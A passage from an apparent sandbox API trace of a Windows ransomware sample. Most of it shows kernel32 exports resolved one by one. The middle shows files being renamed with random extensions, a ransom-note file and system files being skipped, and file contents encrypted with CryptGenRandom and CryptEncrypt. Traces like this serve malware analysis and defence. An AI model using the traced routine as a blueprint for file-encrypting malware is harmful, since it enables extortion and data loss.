(lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.783] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.784] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.784] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.784] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.784] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.784] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.784] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.784] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.784] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.784] lstrlenA (lpString="DELETEATOM") returned 10 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.784] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.784] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.784] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.784] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.784] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.784] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.784] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.784] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.784] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.784] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.785] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.785] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.785] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.785] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.785] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.785] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.785] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.785] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.785] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.785] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.785] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.785] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.785] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.785] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.785] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.785] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.785] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.785] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.785] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.786] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.786] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.786] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.786] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.786] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.786] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.786] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.786] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.786] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.786] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.786] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.786] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.786] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.786] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.786] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.787] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc") returned 70 [0084.787] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc.zKpz2HF") returned 78 [0084.787] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\ttvssd4p8.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc.zKpz2HF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\ttvssd4p8.doc.zkpz2hf"), dwFlags=0x0) returned 1 [0084.787] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.787] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.788] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.788] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b3ef4d0, ftCreationTime.dwHighDateTime=0x1d4ce11, ftLastAccessTime.dwLowDateTime=0x4dc10e80, ftLastAccessTime.dwHighDateTime=0x1d4d435, ftLastWriteTime.dwLowDateTime=0x4dc10e80, ftLastWriteTime.dwHighDateTime=0x1d4d435, nFileSizeHigh=0x0, nFileSizeLow=0xd3c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="xejZJaZ6j G_Ckr.pptx", cAlternateFileName="XEJZJA~1.PPT")) returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="autorun.inf") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="boot.ini") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="desktop.ini") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="ntuser.dat") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="iconcache.db") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="bootsect.bak") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="ntuser.dat.log") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="thumbs.db") returned 1 [0084.788] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx", lpString2="Bootfont.bin") returned 1 [0084.788] lstrlenW (lpString="xejZJaZ6j G_Ckr.pptx") returned 20 [0084.788] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0084.788] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0084.788] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0084.788] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0084.788] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.788] lstrlenW (lpString="xejZJaZ6j G_Ckr.pptx") returned 20 [0084.788] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.788] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="xejZJaZ6j G_Ckr.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx" [0084.788] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\xejzjaz6j g_ckr.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.789] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=54213) returned 1 [0084.789] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.789] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.789] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.789] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.789] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.789] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.790] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.791] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.791] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.792] CloseHandle (hObject=0x42c) returned 1 [0084.792] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.792] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.792] CloseHandle (hObject=0x0) returned 0 [0084.792] CloseHandle (hObject=0x428) returned 1 [0084.792] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.793] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.793] GetTickCount () returned 0x114da87 [0084.793] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.793] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.793] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.794] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.794] lstrlenA (lpString="kernel32.dll") returned 12 [0084.794] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.794] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.794] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.794] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.794] lstrlenA (lpString="ADDATOMA") returned 8 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.794] lstrlenA (lpString="ADDATOMW") returned 8 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.794] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.794] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.794] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.794] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.794] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.794] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.795] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.795] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.795] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.795] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.795] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.795] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.795] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.795] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.795] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.795] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.795] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.795] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.795] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.795] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.795] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.795] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.795] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.795] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.795] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.796] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.796] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.796] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.796] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.796] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.796] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.796] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.796] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.796] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.796] lstrlenA 